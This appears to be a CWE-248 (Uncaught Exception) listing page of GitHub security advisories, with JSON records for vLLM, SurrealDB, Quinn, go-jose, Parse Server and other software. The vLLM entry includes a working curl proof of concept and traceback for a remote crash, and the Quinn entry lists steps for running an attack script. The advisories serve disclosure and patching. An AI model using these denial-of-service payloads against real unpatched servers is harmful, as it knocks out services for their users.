CWE-248
AllowedUncaught Exception
Abstraction: Base · Status: Draft
An exception is thrown from a function, but it is not caught.
420 vulnerabilities reference this CWE, most recent first.
GHSA-6QC9-V4R8-22XG
Vulnerability from github – Published: 2025-05-28 19:41 – Updated: 2025-06-27 21:06Summary
Hitting the /v1/completions API with a invalid json_schema as a Guided Param will kill the vllm server
Details
The following API call
(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'
will provoke a Uncaught exceptions from xgrammer in
./lib64/python3.11/site-packages/xgrammar/compiler.py
Issue with more information: https://github.com/vllm-project/vllm/issues/17248
PoC
Make a call to vllm with invalid json_scema e.g. {\"properties\":{\"reason\":{\"type\": \"stsring\"}}}
curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'
Impact
vllm crashes
example traceback
ERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last):
ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 333, in run_engine_core
ERROR 03-26 17:25:01 [core.py:340] engine_core.run_busy_loop()
ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 367, in run_busy_loop
ERROR 03-26 17:25:01 [core.py:340] outputs = step_fn()
ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 181, in step
ERROR 03-26 17:25:01 [core.py:340] scheduler_output = self.scheduler.schedule()
ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py", line 257, in schedule
ERROR 03-26 17:25:01 [core.py:340] if structured_output_req and structured_output_req.grammar:
ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 41, in grammar
ERROR 03-26 17:25:01 [core.py:340] completed = self._check_grammar_completion()
ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 29, in _check_grammar_completion
ERROR 03-26 17:25:01 [core.py:340] self._grammar = self._grammar.result(timeout=0.0001)
ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340] File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 456, in result
ERROR 03-26 17:25:01 [core.py:340] return self.__get_result()
ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340] File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 401, in __get_result
ERROR 03-26 17:25:01 [core.py:340] raise self._exception
ERROR 03-26 17:25:01 [core.py:340] File "/usr/lib64/python3.11/concurrent/futures/thread.py", line 58, in run
ERROR 03-26 17:25:01 [core.py:340] result = self.fn(*self.args, **self.kwargs)
ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/structured_output/__init__.py", line 120, in _async_create_grammar
ERROR 03-26 17:25:01 [core.py:340] ctx = self.compiler.compile_json_schema(grammar_spec,
ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/venv/lib64/python3.11/site-packages/xgrammar/compiler.py", line 101, in compile_json_schema
ERROR 03-26 17:25:01 [core.py:340] self._handle.compile_json_schema(
ERROR 03-26 17:25:01 [core.py:340] RuntimeError: [17:25:01] /project/cpp/json_schema_converter.cc:795: Check failed: (schema.is<picojson::object>()) is false: Schema should be an object or bool
ERROR 03-26 17:25:01 [core.py:340]
ERROR 03-26 17:25:01 [core.py:340]
CRITICAL 03-26 17:25:01 [core_client.py:269] Got fatal signal from worker processes, shutting down. See stack trace above for root cause issue.
Fix
- https://github.com/vllm-project/vllm/pull/17623
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "vllm"
},
"ranges": [
{
"events": [
{
"introduced": "0.8.0"
},
{
"fixed": "0.9.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-48942"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2025-05-28T19:41:53Z",
"nvd_published_at": "2025-05-30T19:15:30Z",
"severity": "MODERATE"
},
"details": "### Summary\nHitting the /v1/completions API with a invalid json_schema as a Guided Param will kill the vllm server\n\n\n### Details\nThe following API call \n`(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H \"Content-Type: application/json\" -d \u0027{\"model\": \"meta-llama/Llama-3.2-3B-Instruct\",\"prompt\": \"Name two great reasons to visit Sligo \", \"max_tokens\": 10, \"temperature\": 0.5, \"guided_json\":\"{\\\"properties\\\":{\\\"reason\\\":{\\\"type\\\": \\\"stsring\\\"}}}\"}\u0027 \n`\nwill provoke a Uncaught exceptions from xgrammer in \n`./lib64/python3.11/site-packages/xgrammar/compiler.py\n`\n\nIssue with more information: https://github.com/vllm-project/vllm/issues/17248\n\n### PoC\nMake a call to vllm with invalid json_scema e.g. `{\\\"properties\\\":{\\\"reason\\\":{\\\"type\\\": \\\"stsring\\\"}}}`\n\n`curl -s http://localhost:8000/v1/completions -H \"Content-Type: application/json\" -d \u0027{\"model\": \"meta-llama/Llama-3.2-3B-Instruct\",\"prompt\": \"Name two great reasons to visit Sligo \", \"max_tokens\": 10, \"temperature\": 0.5, \"guided_json\":\"{\\\"properties\\\":{\\\"reason\\\":{\\\"type\\\": \\\"stsring\\\"}}}\"}\u0027\n`\n### Impact\nvllm crashes\n\n\nexample traceback\n```\nERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last):\nERROR 03-26 17:25:01 [core.py:340] File \"/home/derekh/workarea/vllm/vllm/v1/engine/core.py\", line 333, in run_engine_core\nERROR 03-26 17:25:01 [core.py:340] engine_core.run_busy_loop()\nERROR 03-26 17:25:01 [core.py:340] File \"/home/derekh/workarea/vllm/vllm/v1/engine/core.py\", line 367, in run_busy_loop\nERROR 03-26 17:25:01 [core.py:340] outputs = step_fn()\nERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340] File \"/home/derekh/workarea/vllm/vllm/v1/engine/core.py\", line 181, in step\nERROR 03-26 17:25:01 [core.py:340] scheduler_output = self.scheduler.schedule()\nERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340] File \"/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py\", line 257, in schedule\nERROR 03-26 17:25:01 [core.py:340] if structured_output_req and structured_output_req.grammar:\nERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340] File \"/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py\", line 41, in grammar\nERROR 03-26 17:25:01 [core.py:340] completed = self._check_grammar_completion()\nERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340] File \"/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py\", line 29, in _check_grammar_completion\nERROR 03-26 17:25:01 [core.py:340] self._grammar = self._grammar.result(timeout=0.0001)\nERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340] File \"/usr/lib64/python3.11/concurrent/futures/_base.py\", line 456, in result\nERROR 03-26 17:25:01 [core.py:340] return self.__get_result()\nERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340] File \"/usr/lib64/python3.11/concurrent/futures/_base.py\", line 401, in __get_result\nERROR 03-26 17:25:01 [core.py:340] raise self._exception\nERROR 03-26 17:25:01 [core.py:340] File \"/usr/lib64/python3.11/concurrent/futures/thread.py\", line 58, in run\nERROR 03-26 17:25:01 [core.py:340] result = self.fn(*self.args, **self.kwargs)\nERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340] File \"/home/derekh/workarea/vllm/vllm/v1/structured_output/__init__.py\", line 120, in _async_create_grammar\nERROR 03-26 17:25:01 [core.py:340] ctx = self.compiler.compile_json_schema(grammar_spec,\nERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340] File \"/home/derekh/workarea/vllm/venv/lib64/python3.11/site-packages/xgrammar/compiler.py\", line 101, in compile_json_schema\nERROR 03-26 17:25:01 [core.py:340] self._handle.compile_json_schema(\nERROR 03-26 17:25:01 [core.py:340] RuntimeError: [17:25:01] /project/cpp/json_schema_converter.cc:795: Check failed: (schema.is\u003cpicojson::object\u003e()) is false: Schema should be an object or bool\nERROR 03-26 17:25:01 [core.py:340] \nERROR 03-26 17:25:01 [core.py:340] \nCRITICAL 03-26 17:25:01 [core_client.py:269] Got fatal signal from worker processes, shutting down. See stack trace above for root cause issue.\n```\n\n### Fix\n\n* https://github.com/vllm-project/vllm/pull/17623",
"id": "GHSA-6qc9-v4r8-22xg",
"modified": "2025-06-27T21:06:56Z",
"published": "2025-05-28T19:41:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-6qc9-v4r8-22xg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48942"
},
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/issues/17248"
},
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/pull/17623"
},
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/commit/08bf7840780980c7568c573c70a6a8db94fd45ff"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2025-54.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/vllm-project/vllm"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "vLLM DOS: Remotely kill vllm over http with invalid JSON schema"
}
GHSA-6VV4-QQ3R-9RV8
Vulnerability from github – Published: 2023-02-12 15:30 – Updated: 2023-02-24 16:02Uncaught Exception in GitHub repository thorsten/phpmyfaq prior to 3.1.11.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "thorsten/phpmyfaq"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-0790"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2023-02-14T01:04:31Z",
"nvd_published_at": "2023-02-12T14:15:00Z",
"severity": "HIGH"
},
"details": "Uncaught Exception in GitHub repository thorsten/phpmyfaq prior to 3.1.11.",
"id": "GHSA-6vv4-qq3r-9rv8",
"modified": "2023-02-24T16:02:36Z",
"published": "2023-02-12T15:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0790"
},
{
"type": "WEB",
"url": "https://github.com/thorsten/phpmyfaq/commit/f34d84dfe551ecdd675916e45cc0606e04a0734e"
},
{
"type": "PACKAGE",
"url": "https://github.com/thorsten/phpMyFAQ"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/06af150b-b481-4248-9a48-56ded2814156"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Uncaught Exception in thorsten/phpmyfaq"
}
GHSA-6WR5-JMPR-MJCX
Vulnerability from github – Published: 2024-02-21 00:03 – Updated: 2024-02-21 00:03The query executor would panic when executing a query containing a call to a built-in SurrealDB function that did not exist. This could occur accidentally in situations where the version of the SurrealDB client was newer than the SurrealDB server or when a pre-parsed query was provided to the server via a newer version of the SurrealDB SDK.
Impact
A client that is authorized to run queries in a SurrealDB server is able to craft and execute a pre-parsed query invoking a nonexistent built-in function, which will cause a panic. This will crash the server, leading to denial of service.
Patches
- Version 1.2.0 and later are not affected by this issue.
Workarounds
Concerned users unable to update may want to limit the ability of untrusted users to run arbitrary SurrealQL queries in the affected versions of SurrealDB. To limit the impact of the denial of service, SurrealDB administrators may also want to ensure that the SurrealDB process is running so that it can be automatically re-started after a crash.
References
-
3454
- https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=65755
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.1.1"
},
"package": {
"ecosystem": "crates.io",
"name": "surrealdb"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.2.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2024-02-21T00:03:06Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "The query executor would panic when executing a query containing a call to a built-in SurrealDB function that did not exist. This could occur accidentally in situations where the version of the SurrealDB client was newer than the SurrealDB server or when a pre-parsed query was provided to the server via a newer version of the SurrealDB SDK.\n\n### Impact\n\nA client that is authorized to run queries in a SurrealDB server is able to craft and execute a pre-parsed query invoking a nonexistent built-in function, which will cause a panic. This will crash the server, leading to denial of service.\n\n### Patches\n\n- Version 1.2.0 and later are not affected by this issue.\n\n### Workarounds\n\nConcerned users unable to update may want to limit the ability of untrusted users to run arbitrary SurrealQL queries in the affected versions of SurrealDB. To limit the impact of the denial of service, SurrealDB administrators may also want to ensure that the SurrealDB process is running so that it can be automatically re-started after a crash.\n\n### References\n\n- #3454\n- https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=65755",
"id": "GHSA-6wr5-jmpr-mjcx",
"modified": "2024-02-21T00:03:06Z",
"published": "2024-02-21T00:03:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/surrealdb/surrealdb/security/advisories/GHSA-6wr5-jmpr-mjcx"
},
{
"type": "WEB",
"url": "https://github.com/surrealdb/surrealdb/pull/3454"
},
{
"type": "WEB",
"url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=65755"
},
{
"type": "PACKAGE",
"url": "https://github.com/surrealdb/surrealdb"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Uncaught Exception in Macro Expecting Native Function to Exist"
}
GHSA-6XVM-J4WR-6V98
Vulnerability from github – Published: 2026-03-11 00:09 – Updated: 2026-03-11 05:46Summary
A remote, unauthenticated attacker can trigger a denial of service in applications using vulnerable quinn versions by sending a crafted QUIC Initial packet containing malformed quic_transport_parameters. In quinn-proto parsing logic, attacker-controlled varints are decoded with unwrap(), so truncated encodings cause Err(UnexpectedEnd) and panic. This is reachable over the network with a single packet and no prior trust or authentication.
Details
The issue is panic-on-untrusted-input in QUIC transport parameter parsing.
In quinn-proto (observed in quinn-proto 0.11.13), parsing of some transport parameters uses a fallible varint decode followed by unwrap(). For malformed/truncated parameter values, decode returns UnexpectedEnd, and unwrap() panics.
Observed output:
thread 'tokio-rt-worker' (2366474) panicked at quinn-proto/src/transport_parameters.rs:473:67:
called `Result::unwrap()` on an `Err` value: UnexpectedEnd
PoC
Reproduces against the upstream Quinn server example.
- Start server:
cargo run --example server -- ./
- Prepare PoC client environment:
python3 -m venv .venv
source .venv/bin/activate
pip install aioquic
- Run PoC script attack.py against server QUIC listener (default example target shown):
python attack.py
Observed output
thread 'tokio-rt-worker' (2366903) panicked at quinn-proto/src/transport_parameters.rs:473:67:
called `Result::unwrap()` on an `Err` value: UnexpectedEnd
Impact
Vulnerability type: Remote Denial of Service (panic/crash)
Attack requirements: Network reachability to UDP QUIC listener
Authentication/privileges: None
Who is impacted: Any server/application using affected quinn/quinn-proto versions where this parse path is reachable; process-level impact depends on integration panic handling policy
This vulnerability was originally submitted by @revofusion to the Ethereum Foundation bug bounty program
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "quinn-proto"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.11.14"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-31812"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-11T00:09:19Z",
"nvd_published_at": "2026-03-10T22:16:18Z",
"severity": "HIGH"
},
"details": "### Summary\nA remote, unauthenticated attacker can trigger a denial of service in applications using vulnerable `quinn` versions by sending a crafted QUIC Initial packet containing malformed `quic_transport_parameters`. `In quinn-proto` parsing logic, attacker-controlled varints are decoded with `unwrap()`, so truncated encodings cause `Err(UnexpectedEnd)` and `panic`. This is reachable over the network with a single packet and no prior trust or authentication.\n\n### Details\nThe issue is panic-on-untrusted-input in QUIC transport parameter parsing.\nIn `quinn-proto` (observed in `quinn-proto 0.11.13`), parsing of some transport parameters uses a fallible varint decode followed by `unwrap()`. For malformed/truncated parameter values, decode returns `UnexpectedEnd`, and `unwrap()` panics.\n\n#### Observed output:\n```\nthread \u0027tokio-rt-worker\u0027 (2366474) panicked at quinn-proto/src/transport_parameters.rs:473:67:\ncalled `Result::unwrap()` on an `Err` value: UnexpectedEnd\n```\n\n### PoC\n#### Reproduces against the upstream Quinn server example.\n1. Start server:\n```\ncargo run --example server -- ./\n```\n2. Prepare PoC client environment:\n```\npython3 -m venv .venv\nsource .venv/bin/activate\npip install aioquic\n```\n3. Run PoC script [attack.py](https://github.com/user-attachments/files/25741713/attack.py) against server QUIC listener (default example target shown):\n```\npython attack.py\n```\n#### Observed output\n```\nthread \u0027tokio-rt-worker\u0027 (2366903) panicked at quinn-proto/src/transport_parameters.rs:473:67:\ncalled `Result::unwrap()` on an `Err` value: UnexpectedEnd\n```\n\n\n\n### Impact\nVulnerability type: Remote Denial of Service (panic/crash)\nAttack requirements: Network reachability to UDP QUIC listener\nAuthentication/privileges: None\nWho is impacted: Any server/application using affected `quinn/quinn-proto` versions where this parse path is reachable; process-level impact depends on integration panic handling policy\n\n\nThis vulnerability was originally submitted by @revofusion to the Ethereum Foundation bug bounty program",
"id": "GHSA-6xvm-j4wr-6v98",
"modified": "2026-03-11T05:46:01Z",
"published": "2026-03-11T00:09:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/quinn-rs/quinn/security/advisories/GHSA-6xvm-j4wr-6v98"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31812"
},
{
"type": "WEB",
"url": "https://github.com/quinn-rs/quinn/pull/2559"
},
{
"type": "PACKAGE",
"url": "https://github.com/quinn-rs/quinn"
},
{
"type": "WEB",
"url": "https://rustsec.org/advisories/RUSTSEC-2026-0037.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Quinn affected by unauthenticated remote DoS via panic in QUIC transport parameter parsing"
}
GHSA-765F-85MC-5QMW
Vulnerability from github – Published: 2025-09-25 18:30 – Updated: 2025-09-29 18:33A Name Error occurs in pytorch v2.7.0 when a PyTorch model consists of torch.cummin and is compiled by Inductor, leading to a Denial of Service (DoS).
{
"affected": [],
"aliases": [
"CVE-2025-55557"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-25T16:15:34Z",
"severity": "HIGH"
},
"details": "A Name Error occurs in pytorch v2.7.0 when a PyTorch model consists of torch.cummin and is compiled by Inductor, leading to a Denial of Service (DoS).",
"id": "GHSA-765f-85mc-5qmw",
"modified": "2025-09-29T18:33:12Z",
"published": "2025-09-25T18:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55557"
},
{
"type": "WEB",
"url": "https://github.com/pytorch/pytorch/issues/151738"
},
{
"type": "WEB",
"url": "https://github.com/pytorch/pytorch/pull/151931"
},
{
"type": "WEB",
"url": "https://gist.github.com/shaoyuyoung/0e7d2a586297ae9c8ed14d8706749efc"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-78H2-9FRX-2JM8
Vulnerability from github – Published: 2026-04-03 03:28 – Updated: 2026-04-06 23:11Impact
Decrypting a JSON Web Encryption (JWE) object will panic if the alg field indicates a key wrapping algorithm (one ending in KW, with the exception of A128GCMKW, A192GCMKW, and A256GCMKW) and the encrypted_key field is empty. The panic happens when cipher.KeyUnwrap() in key_wrap.go attempts to allocate a slice with a zero or negative length based on the length of the encrypted_key.
This code path is reachable from ParseEncrypted() / ParseEncryptedJSON() / ParseEncryptedCompact() followed by Decrypt() on the resulting object. Note that the parse functions take a list of accepted key algorithms. If the accepted key algorithms do not include any key wrapping algorithms, parsing will fail and the application will be unaffected.
This panic is also reachable by calling cipher.KeyUnwrap() directly with any ciphertext parameter less than 16 bytes long, but calling this function directly is less common.
Panics can lead to denial of service.
Fixed In
4.1.4 and v3.0.5
Workarounds
If the list of keyAlgorithms passed to ParseEncrypted() / ParseEncryptedJSON() / ParseEncryptedCompact() does not include key wrapping algorithms (those ending in KW), your application is unaffected.
If your application uses key wrapping, you can prevalidate to the JWE objects to ensure the encrypted_key field is nonempty. If your application accepts JWE Compact Serialization, apply that validation to the corresponding field of that serialization (the data between the first and second .).
Thanks
Thanks to Datadog's Security team for finding this issue.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/go-jose/go-jose/v4"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/go-jose/go-jose/v3"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/go-jose/go-jose"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.6.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34986"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-03T03:28:56Z",
"nvd_published_at": "2026-04-06T17:17:11Z",
"severity": "HIGH"
},
"details": "### Impact\n\nDecrypting a JSON Web Encryption (JWE) object will panic if the `alg` field indicates a key wrapping algorithm ([one ending in `KW`](https://pkg.go.dev/github.com/go-jose/go-jose/v4#pkg-constants), with the exception of `A128GCMKW`, `A192GCMKW`, and `A256GCMKW`) and the `encrypted_key` field is empty. The panic happens when `cipher.KeyUnwrap()` in `key_wrap.go` attempts to allocate a slice with a zero or negative length based on the length of the `encrypted_key`.\n\nThis code path is reachable from `ParseEncrypted()` / `ParseEncryptedJSON()` / `ParseEncryptedCompact()` followed by `Decrypt()` on the resulting object. Note that the parse functions take a list of accepted key algorithms. If the accepted key algorithms do not include any key wrapping algorithms, parsing will fail and the application will be unaffected.\n\nThis panic is also reachable by calling `cipher.KeyUnwrap()` directly with any `ciphertext` parameter less than 16 bytes long, but calling this function directly is less common.\n\nPanics can lead to denial of service.\n\n### Fixed In\n\n4.1.4 and v3.0.5\n\n### Workarounds\n\nIf the list of `keyAlgorithms` passed to `ParseEncrypted()` / `ParseEncryptedJSON()` / `ParseEncryptedCompact()` does not include key wrapping algorithms (those ending in `KW`), your application is unaffected.\n\nIf your application uses key wrapping, you can prevalidate to the JWE objects to ensure the `encrypted_key` field is nonempty. If your application accepts JWE Compact Serialization, apply that validation to the corresponding field of that serialization (the data between the first and second `.`).\n\n### Thanks\n\nThanks to Datadog\u0027s Security team for finding this issue.",
"id": "GHSA-78h2-9frx-2jm8",
"modified": "2026-04-06T23:11:46Z",
"published": "2026-04-03T03:28:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34986"
},
{
"type": "PACKAGE",
"url": "https://github.com/go-jose/go-jose"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/github.com/go-jose/go-jose/v4#pkg-constants"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Go JOSE Panics in JWE decryption"
}
GHSA-7FM6-52CC-8V3R
Vulnerability from github – Published: 2024-04-01 03:30 – Updated: 2025-03-13 18:31In flashc, there is a possible information disclosure due to an uncaught exception. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541765; Issue ID: ALPS08541765.
{
"affected": [],
"aliases": [
"CVE-2024-20049"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-01T03:15:08Z",
"severity": "MODERATE"
},
"details": "In flashc, there is a possible information disclosure due to an uncaught exception. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541765; Issue ID: ALPS08541765.",
"id": "GHSA-7fm6-52cc-8v3r",
"modified": "2025-03-13T18:31:54Z",
"published": "2024-04-01T03:30:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20049"
},
{
"type": "WEB",
"url": "https://corp.mediatek.com/product-security-bulletin/April-2024"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7X3M-W77C-7WH5
Vulnerability from github – Published: 2025-04-07 06:30 – Updated: 2025-04-07 06:30Exception capture failure vulnerability in the SVG parsing module of the ArkUI framework Impact: Successful exploitation of this vulnerability may affect availability.
{
"affected": [],
"aliases": [
"CVE-2024-58111"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-07T04:15:16Z",
"severity": "HIGH"
},
"details": "Exception capture failure vulnerability in the SVG parsing module of the ArkUI framework\nImpact: Successful exploitation of this vulnerability may affect availability.",
"id": "GHSA-7x3m-w77c-7wh5",
"modified": "2025-04-07T06:30:27Z",
"published": "2025-04-07T06:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-58111"
},
{
"type": "WEB",
"url": "https://consumer.huawei.com/en/support/bulletin/2025/4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-827P-G5X5-H86C
Vulnerability from github – Published: 2026-03-17 18:37 – Updated: 2026-03-19 21:12Impact
A remote attacker can crash the Parse Server by subscribing to a LiveQuery with an invalid regular expression pattern. The server process terminates when the invalid pattern reaches the regex engine during subscription matching, causing denial of service for all connected clients.
Patches
The fix validates regular expression patterns at subscription time, rejecting invalid patterns before they are stored. Additionally, a defense-in-depth try-catch prevents any subscription matching error from crashing the server process.
Workarounds
Disable LiveQuery if it is not needed.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "parse-server"
},
"ranges": [
{
"events": [
{
"introduced": "9.0.0"
},
{
"fixed": "9.6.0-alpha.19"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "parse-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.6.43"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32770"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-17T18:37:30Z",
"nvd_published_at": "2026-03-18T22:16:25Z",
"severity": "MODERATE"
},
